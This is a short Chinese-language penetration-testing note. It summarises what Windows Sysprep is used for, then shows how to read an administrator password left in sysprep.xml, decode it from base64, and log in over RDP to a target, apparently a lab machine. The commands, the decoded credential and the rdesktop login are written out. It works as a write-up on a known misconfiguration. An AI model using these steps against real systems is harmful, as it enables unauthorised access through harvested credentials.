主要实际用途
1. 通过创建可在多种硬件设计中使用的通用映像来管理多台电脑。
2. 通过捕获并部署具有唯一安全标识符的映像来部署电脑。
3. 通过在审核模式下添加应用、语言或驱动程序来微调单个电脑的安装。 有关详细信息,请参阅审核模式概述。
4. 在将电脑交付给客户之前,通过在审核模式下进行测试来提供更可靠的电脑。
总结:部署时方便,在域控下同时部署多台客户端,节省了验证等操作
渗透利用
背景
现通过 NTLM 登录目标服务器,发现存在 sysprep.xml 文件,查看其内容存在管理员部署的账号信息。
C:\Users\Administrator\Documents> type sysprep.xml
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>
<Value>Zmc1NGZnR0ZINGdmZ0c=</Value>
<PlainText>false</PlainText>
</Password>
<Description>Local Administrator</Description>
<DisplayName>Administrator</DisplayName>
<Group>Administrators</Group>
<Name>Administrator</Name>
</LocalAccount>
</LocalAccounts>
解密base64即可远程登录该目标
echo "Zmc1NGZnR0ZINGdmZ0c=" | base64 -d
fg54fgGFH4gfgG
rdesktop -g 1240x600 -u administrator -p "fg54fgGFH4gfgG" 10.11.1.221